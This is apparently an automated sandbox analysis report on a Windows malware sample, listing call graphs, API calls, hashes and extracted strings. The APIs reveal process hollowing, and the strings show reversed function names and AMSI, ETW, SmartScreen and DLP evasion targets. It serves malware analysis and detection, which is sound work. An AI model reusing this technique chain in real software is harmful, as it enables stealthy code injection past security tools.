31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31b7a2c 7251->7278 7278->6916 7382 31b9d76-31b9e6f call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31b8c80 7278->7382 7349 31b9a7c-31b9b7d call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31b7a2c 7341->7349 7342->7349 7349->7278 7433 31b9ec3-31ba8b2 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31b7d78 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31b7d78 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 SetThreadContext NtResumeThread call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a2c2c call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31b894c * 3 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31b894c * 2 call 31a4860 call 31a49a0 call 31a47ec call 31a49a0 call 31b894c call 31a4860 call 31a49a0 call 31a47ec call 31a49a0 call 31b894c * 5 call 31a4860 call 31a49a0 call 31a47ec call 31a49a0 call 31b894c call 31a4860 call 31a49a0 call 31a47ec call 31a49a0 call 31b894c call 31a4860 call 31a49a0 call 31a47ec call 31a49a0 call 31b894c call 31a4860 call 31a49a0 call 31a47ec call 31a49a0 call 31b894c call 31b8080 call 31b894c * 2 7382->7433 7434 31b9e71-31b9ebe call 31b8b78 call 31b8b6c 7382->7434 7433->6916 7434->7433
                                                                                              APIs
                                                                                                • Part of subcall function 031B89D0: FreeLibrary.KERNEL32(03227388,00000000,00000000,00000000,00000000,0322738C,Function_0000562C,00000004,0322739C,0322738C,05F5E103,00000040,032273A0,03227388,00000000,00000000), ref: 031B8AAA
                                                                                                • Part of subcall function 031B8788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 031B8814
                                                                                              • GetThreadContext.KERNEL32(032273D4,03227424,ScanString,032273A8,031BA93C,UacInitialize,032273A8,031BA93C,ScanBuffer,032273A8,031BA93C,ScanBuffer,032273A8,031BA93C,UacInitialize,032273A8), ref: 031B9602
                                                                                                • Part of subcall function 031B8400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 031B8471
                                                                                                • Part of subcall function 031B8670: NtUnmapViewOfSection.NTDLL(?,?), ref: 031B86D5
                                                                                                • Part of subcall function 031B7A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 031B7A9F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryVirtual$AllocateContextCreateFreeLibraryProcessReadSectionThreadUnmapUserView
                                                                                              • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                              • API String ID: 3386062106-51457883
                                                                                              • Opcode ID: 7a8e205e086c546e66d5d3ec26e00943615ec1ca6c86d68583ab672f0414c3c3
                                                                                              • Instruction ID: d07edac37b274b2eee33aac992351979974b763c8d09f9c08dea95b33f256576
                                                                                              • Opcode Fuzzy Hash: 7a8e205e086c546e66d5d3ec26e00943615ec1ca6c86d68583ab672f0414c3c3
                                                                                              • Instruction Fuzzy Hash: 19E2E93DA04A589FCB11FB69DC80ACE73B9AF9C601F5041A1E058AF315DF70EE869B51
                                                                                              Function 031A5ACC Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 184registrystringlibraryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 10939 31a5acc-31a5b0d GetModuleFileNameA RegOpenKeyExA 10940 31a5b4f-31a5b92 call 31a5908 RegQueryValueExA 10939->10940 10941 31a5b0f-31a5b2b RegOpenKeyExA 10939->10941 10948 31a5bb6-31a5bd0 RegCloseKey 10940->10948 10949 31a5b94-31a5bb0 RegQueryValueExA 10940->10949 10941->10940 10942 31a5b2d-31a5b49 RegOpenKeyExA 10941->10942 10942->10940 10944 31a5bd8-31a5c09 lstrcpyn GetThreadLocale GetLocaleInfoA 10942->10944 10946 31a5c0f-31a5c13 10944->10946 10947 31a5cf2-31a5cf9 10944->10947 10950 31a5c1f-31a5c35 lstrlen 10946->10950 10951 31a5c15-31a5c19 10946->10951 10948->10944 10949->10948 10952 31a5bb2 10949->10952 10953 31a5c38-31a5c3b 10950->10953 10951->10947 10951->10950 10952->10948 10954 31a5c3d-31a5c45 10953->10954 10955 31a5c47-31a5c4f 10953->10955 10954->10955 10956 31a5c37 10954->10956 10955->10947 10957 31a5c55-31a5c5a 10955->10957 10956->10953 10958 31a5c5c-31a5c82 lstrcpyn LoadLibraryExA 10957->10958 10959 31a5c84-31a5c86 10957->10959 10958->10959 10959->10947 10960 31a5c88-31a5c8c 10959->10960 10960->10947 10961 31a5c8e-31a5cbe lstrcpyn LoadLibraryExA 10960->10961 10961->10947 10962 31a5cc0-31a5cf0 lstrcpyn LoadLibraryExA 10961->10962 10962->10947
                                                                                              APIs
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 031A5AE8
                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 031A5B06
                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 031A5B24
                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 031A5B42
                                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,031A5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 031A5B8B
                                                                                              • RegQueryValueExA.ADVAPI32(?,031A5D38,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,031A5BD1,?,80000001), ref: 031A5BA9
                                                                                              • RegCloseKey.ADVAPI32(?,031A5BD8,00000000,00000000,00000005,00000000,031A5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 031A5BCB
                                                                                              • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 031A5BE8
                                                                                              • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105), ref: 031A5BF5
                                                                                              • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105), ref: 031A5BFB
                                                                                              • lstrlen.KERNEL32(00000000), ref: 031A5C26
                                                                                              • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 031A5C6D
                                                                                              • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 031A5C7D
                                                                                              • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 031A5CA5
                                                                                              • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 031A5CB5
                                                                                              • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 031A5CDB
                                                                                              • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 031A5CEB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                              • String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                              • API String ID: 1759228003-3917250287
                                                                                              • Opcode ID: d8148d87ee2c0a515ae068f23cae8cc70379e81341baa35d196d89c93d0d005e
                                                                                              • Instruction ID: 17c233aeb6141e72c3cffbd5e9281f1ec72455fa4fbd48f5f743dd8d873040a7
                                                                                              • Opcode Fuzzy Hash: d8148d87ee2c0a515ae068f23cae8cc70379e81341baa35d196d89c93d0d005e
                                                                                              • Instruction Fuzzy Hash: BD510A7DA4475C7FEB20D6AC8C45FEFB7AD9B0D342F1400A2AA40E6185E774DA488B60
                                                                                              Function 031B7A2A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 031B81CC: GetModuleHandleA.KERNELBASE(?), ref: 031B821E
                                                                                                • Part of subcall function 031B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031B82C7
                                                                                                • Part of subcall function 031B8274: GetProcAddress.KERNEL32(?,?), ref: 031B82D9
                                                                                              • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 031B7A9F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$AllocateHandleMemoryModuleVirtual
                                                                                              • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                              • API String ID: 1888340430-445027087
                                                                                              • Opcode ID: 54064e8b438cd3fa95102980866ff54971d03c025b0a0437b5cf234b72961bb3
                                                                                              • Instruction ID: 677f420b566d3d021f455fbcd043bb887972ecb07d9987e889d3052d0c1af553
                                                                                              • Opcode Fuzzy Hash: 54064e8b438cd3fa95102980866ff54971d03c025b0a0437b5cf234b72961bb3
                                                                                              • Instruction Fuzzy Hash: DA111B79204308BFDB14EFA9EC51EEE77BCEB8C610F509460F900DB681DB70AA008B64
                                                                                              Function 031B7A2C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 031B81CC: GetModuleHandleA.KERNELBASE(?), ref: 031B821E
                                                                                                • Part of subcall function 031B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031B82C7
                                                                                                • Part of subcall function 031B8274: GetProcAddress.KERNEL32(?,?), ref: 031B82D9
                                                                                              • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 031B7A9F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$AllocateHandleMemoryModuleVirtual
                                                                                              • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                              • API String ID: 1888340430-445027087
                                                                                              • Opcode ID: 650208f9fb7737f384f9b95ee23ae72eac3d3b9e51fbd6f81e2d511c5e5a2260
                                                                                              • Instruction ID: 534b1e459e0a4691c05e9b0b94ec3466c0404b61fe973a2e9892b6e9db57c29b
                                                                                              • Opcode Fuzzy Hash: 650208f9fb7737f384f9b95ee23ae72eac3d3b9e51fbd6f81e2d511c5e5a2260
                                                                                              • Instruction Fuzzy Hash: 76111B79204308BFDB14EFA9EC51EDE77BCEB8C610F509460F900DB681DB70AA008B64
                                                                                              Function 031B8400 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50nativeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 031B81CC: GetModuleHandleA.KERNELBASE(?), ref: 031B821E
                                                                                                • Part of subcall function 031B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031B82C7
                                                                                                • Part of subcall function 031B8274: GetProcAddress.KERNEL32(?,?), ref: 031B82D9
                                                                                              • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 031B8471
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$HandleMemoryModuleReadVirtual
                                                                                              • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                              • API String ID: 36784810-737317276
                                                                                              • Opcode ID: 6f506b4f1918ba29deb2adb7a5602aaa93c912758f36452bd2ddfd553575da35
                                                                                              • Instruction ID: 663a6454901d123f7f371abc8bd9592b3db37c57cc6225d7c954f0d77683f560
                                                                                              • Opcode Fuzzy Hash: 6f506b4f1918ba29deb2adb7a5602aaa93c912758f36452bd2ddfd553575da35
                                                                                              • Instruction Fuzzy Hash: 51012579204748BFDB10EFA9EC51E9EB7FCEB4DA10F518460F904DB641DB74A9008B24
                                                                                              Function 031B7D78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 031B81CC: GetModuleHandleA.KERNELBASE(?), ref: 031B821E
                                                                                                • Part of subcall function 031B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031B82C7
                                                                                                • Part of subcall function 031B8274: GetProcAddress.KERNEL32(?,?), ref: 031B82D9
                                                                                              • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 031B7DEC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$HandleMemoryModuleVirtualWrite
                                                                                              • String ID: Ntdll$yromeMlautriVetirW
                                                                                              • API String ID: 1525300337-3542721025
                                                                                              • Opcode ID: 9bc319e14dd53f47f9dfd710c5ed3caf5f0ce65e52359e6496a7c0f6acaeb354
                                                                                              • Instruction ID: 665638c880d765c733a32c6cb6861009aecb0119ea174e03c567516fa8aa8d70
                                                                                              • Opcode Fuzzy Hash: 9bc319e14dd53f47f9dfd710c5ed3caf5f0ce65e52359e6496a7c0f6acaeb354
                                                                                              • Instruction Fuzzy Hash: 34011779204208AFCB10EF99EC56E9E77FCEF8DA00F508460F800DB681DB70AD108B64
                                                                                              Function 031B8670 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43nativeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 031B81CC: GetModuleHandleA.KERNELBASE(?), ref: 031B821E
                                                                                                • Part of subcall function 031B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031B82C7
                                                                                                • Part of subcall function 031B8274: GetProcAddress.KERNEL32(?,?), ref: 031B82D9
                                                                                              • NtUnmapViewOfSection.NTDLL(?,?), ref: 031B86D5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$HandleModuleSectionUnmapView
                                                                                              • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                              • API String ID: 858119152-2520021413
                                                                                              • Opcode ID: ea7716c70fd4a360e324f9277604b52926ca5a4171586a6bde5fbbaf9b47b517
                                                                                              • Instruction ID: 7627684cf1881a41eee6f439946a8d77a8d5ce3cdbbbba385128e1a20d2b0cf2
                                                                                              • Opcode Fuzzy Hash: ea7716c70fd4a360e324f9277604b52926ca5a4171586a6bde5fbbaf9b47b517
                                                                                              • Instruction Fuzzy Hash: E4014F7C604748BFDB10FFA9EC51E9D77BDEB4DA11F518460E4009B641DB74A9008624
                                                                                              Function 031B86F7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35nativeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 031B81CC: GetModuleHandleA.KERNELBASE(?), ref: 031B821E
                                                                                                • Part of subcall function 031B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031B82C7
                                                                                                • Part of subcall function 031B8274: GetProcAddress.KERNEL32(?,?), ref: 031B82D9
                                                                                              • NtUnmapViewOfSection.NTDLL(?,?), ref: 031B86D5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$HandleModuleSectionUnmapView
                                                                                              • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                              • API String ID: 858119152-2520021413
                                                                                              • Opcode ID: 9ffe1f581c414942d1ee579b17bda99f392349186a162dc794c77935294e9e04
                                                                                              • Instruction ID: 2586d394b4ad182431df35c62aed1a43270eb551266ff0272402be0c04ce34ff
                                                                                              • Opcode Fuzzy Hash: 9ffe1f581c414942d1ee579b17bda99f392349186a162dc794c77935294e9e04
                                                                                              • Instruction Fuzzy Hash: 94F0497CA08388AFCB04FBA9E9459DD77FDEB8DA11B5084A1E4049B245DB30AA01CA10
                                                                                              Function 031BDD70 Relevance: 3.1, APIs: 2, Instructions: 80nativeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 031BDDAB
                                                                                              • NtClose.NTDLL(?), ref: 031BDE25
                                                                                                • Part of subcall function 031A4C60: SysFreeString.OLEAUT32 ref: 031A4C6E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: Path$CloseFreeNameName_String
                                                                                              • String ID:
                                                                                              • API String ID: 11680810-0
                                                                                              • Opcode ID: 9f518491777f10014770e7d47fd6e51e3c66cb7a4a06857dbf2a31d7d35ad3ef
                                                                                              • Instruction ID: fb8a940b3a51a6251b6ac1a9e100263a171176dab13389f7b6b35fdb9d350dc9
                                                                                              • Opcode Fuzzy Hash: 9f518491777f10014770e7d47fd6e51e3c66cb7a4a06857dbf2a31d7d35ad3ef
                                                                                              • Instruction Fuzzy Hash: 8521E079A40708BBDB15EAA5DD52FDEB7BCAB4CB00F500461F200FB180DBB4AA048765
                                                                                              Function 031B7AC9 Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 031B7A9F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateMemoryVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 2167126740-0
                                                                                              • Opcode ID: 8ae3787e6336354a6937ad59b0e7b1866c475cbf9ab40b85fa9897fa7701db5f
                                                                                              • Instruction ID: da3701ef45564d3bf13b977de219228e5c2f261427621c7322ffd5c202d701b6
                                                                                              • Opcode Fuzzy Hash: 8ae3787e6336354a6937ad59b0e7b1866c475cbf9ab40b85fa9897fa7701db5f
                                                                                              • Instruction Fuzzy Hash: 38F0FE7A508248BFDB45DFA8EC54EEA77ECEB8C710F445466F905C7241E7349A008760
                                                                                              Function 031BF7C8 Relevance: 222.6, APIs: 6, Strings: 116, Instructions: 9071COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: Module$AddressFileHandleNamePathProc$AttributesCheckCloseDebuggerFreeLibraryName_PresentRemote
                                                                                              • String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                                              • API String ID: 3113829192-2693441831
                                                                                              • Opcode ID: 6cbf28cd662651204e995d3b650e3546993c98ff3ea99fffd3cadc581e24e066
                                                                                              • Instruction ID: 50bf32549dada879fef6d8aefb8c5e9f922426f91fa38ec8417072f41db5834e
                                                                                              • Opcode Fuzzy Hash: 6cbf28cd662651204e995d3b650e3546993c98ff3ea99fffd3cadc581e24e066
                                                                                              • Instruction Fuzzy Hash: 48142E3CA1865C9FCB10EB69DC81ACE73B9AF9D702F1080A59508AF754DF74AE858F41
                                                                                              Function 031C8122 Relevance: 160.3, APIs: 5, Strings: 85, Instructions: 2780processthreadCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 4573 31c8122-31c8517 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a48ec 4688 31c851d-31c86f0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a47ec call 31a49a0 call 31a4d74 call 31a4df0 CreateProcessAsUserW 4573->4688 4689 31c93a1-31c9524 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a48ec 4573->4689 4798 31c876e-31c8879 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 4688->4798 4799 31c86f2-31c8769 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 4688->4799 4779 31c952a-31c9539 call 31a48ec 4689->4779 4780 31c9cf5-31cb2fa call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a46d4 * 2 call 